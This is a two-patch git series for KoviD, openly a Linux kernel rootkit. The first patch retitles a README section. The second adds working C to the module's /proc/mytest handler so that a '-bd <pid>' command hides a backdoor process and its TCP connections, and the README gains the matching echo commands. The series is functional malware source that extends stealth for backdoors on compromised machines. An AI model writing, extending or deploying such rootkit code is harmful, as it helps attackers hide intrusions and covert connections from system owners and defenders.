From eba03db8bab6e98025756a44a3c6e0bebf4a6632 Mon Sep 17 00:00:00 2001
From: chash <carloslack@gmail.com>
Date: Mon, 29 Apr 2024 20:27:31 +0100
Subject: [PATCH 1/2] changed misleading title

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 4322459..2579ac2 100644
--- a/README.md
+++ b/README.md
@@ -28,7 +28,7 @@
 
 Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master)
 
-### 1.1 Compatible systems
+### 1.1 Mostly tested against
 
     CentOS Linux release 8.3.2011
     4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

From f0cee52d86e790c792988f91d43945d65fc3678e Mon Sep 17 00:00:00 2001
From: JNE <jne@non-negative.org>
Date: Tue, 7 May 2024 08:30:38 -0700
Subject: [PATCH 2/2] Add "-bd" option for hiding backdoor tools

Hiding with "-bd" will also hide tcp connections from/to that process.

Example:

Hiding:
$ echo "-bd 1234" >/proc/mytest

Unhiding:
$ echo "1234" >/proc/mytest
---
 README.md   |  4 ++++
 src/kovid.c | 12 +++++++++++-
 2 files changed, 15 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 2579ac2..c10cbe1 100644
--- a/README.md
+++ b/README.md
@@ -152,6 +152,10 @@ Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master)
 
     You can hide/unhide processes using the /proc/mytest interface.
     For example, to hide a task, run: $ echo 14886 >/proc/mytest.
+    If a task is a backdoor that needs tcp hiding, run:
+        $ echo "-bd <pid>" >/proc/mytest.
+    Unhiding is the same as for regular tasks:
+        $ echo "<PID>" >/proc/mytest
 
 ### 3.3 Hide module
 
diff --git a/src/kovid.c b/src/kovid.c
index 71bee86..ab8c915 100644
--- a/src/kovid.c
+++ b/src/kovid.c
@@ -465,8 +465,18 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
 
         buf[strcspn(buf, "\r\n")] = 0;
 
+        /* Hide PID as backdoor */
+        if(!strncmp(buf, "-bd", MIN(3, size))) {
+            char *tmp = &buf[4];
+            int val = 0;
+            tmp[strcspn(tmp, " ")] = 0;
+            if (kstrtoint(tmp, 10, &val)) {
+                prerr("Failed kstrtoint\n");
+            } else {
+                kv_hide_task_by_pid(val, 1, CHILDREN);
+            }
         /* hide kovid module */
-        if(!strcmp(buf, "-h") && !op_lock) {
+        } else if(!strcmp(buf, "-h") && !op_lock) {
             static unsigned int msg_lock = 0;
             if(!msg_lock) {
                 msg_lock = 1;